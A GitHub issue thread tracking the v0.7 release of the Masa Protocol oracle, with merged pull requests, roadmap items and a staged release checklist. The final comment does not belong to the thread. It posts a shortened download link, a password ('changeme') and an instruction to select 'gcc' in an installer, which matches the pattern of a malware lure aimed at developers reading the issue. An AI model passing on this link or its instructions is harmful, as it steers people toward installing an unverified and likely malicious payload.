### ISSUE TITLE
📣 Masa Protocol release v0.7

### ISSUE THREAD

**Issue by mudler** [masa-finance/roadmap#79]
## 🗺 What's left for release

Missing: https://github.com/masa-finance/masa-oracle/pull/537

* fix(ci): point correctly to main in `goreleaser.yml` by @mudler in https://github.com/masa-finance/masa-oracle/pull/516
* hotfix: swagger bug fixes by @teslashibe in https://github.com/masa-finance/masa-oracle/pull/511
* feat(tests): add baseline for an integration test by @mudler in https://github.com/masa-finance/masa-oracle/pull/527
* fix: multiaddress not constructed on startup by @teslashibe in https://github.com/masa-finance/masa-oracle/pull/524
* chore: revert back changes to fix integration tests by @mudler in https://github.com/masa-finance/masa-oracle/pull/529

### 🌍 Protocol/P2P

- [x] masa-finance/roadmap#12
- [x] https://github.com/masa-finance/masa-oracle/issues/419
- [x] masa-finance/roadmap#66

### Scraper

- [x] https://github.com/masa-finance/masa-oracle/issues/490

### :test_tube: Code testing

- [x] https://github.com/masa-finance/masa-oracle/issues/448

### 🎁 Product:

- [x] masa-finance/roadmap#31
- [x] masa-finance/roadmap#38 
- [x] https://github.com/masa-finance/product-issues/issues/7

### 💻 Infra

- [x] https://github.com/masa-finance/masa-oracle/issues/451
- [x] https://github.com/masa-finance/masa-oracle/issues/499

### CI

- [x] https://github.com/masa-finance/masa-oracle/issues/514

## 🔦 Highlights

This release will feature hardening on the worker selection strategies.

## ✅ Release Checklist

- [ ] **Stage 0 - Finishing Touches**
    - [ ] Make sure CI tests are passing.
    - [ ] https://github.com/masa-finance/masa-oracle/pull/537 is merged
    - [ ] Ensure SDK is aligned to have the neded Oracle features exposed for the release
    - [ ] Ensure the CLI is aligned to consume the latest SDK correctly
    - [ ] There is a Masa-Oracle release
    - [ ] Update release files to bump the version in the Oracle
- [ ] **Stage 1 - Manual testing**
  - How: Using the assets from master, make sure that test scenarios not covered by automatic tests are passing, and that docs are still aligned
    - [ ] ...
- [ ] **Stage 3 - Release**
  - [ ] Tag Oracle
  - [ ] Tag SDK
  - [ ] CLI and App needs to point to SDK version and have its own tag
- [ ] **Stage 4 - After release**
  - [ ] Release notes needs to be updated in the documentation here: https://developers.masa.ai/docs/masa-oracle/RELEASE_NOTES
  - [ ] Update notion documentation about release

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
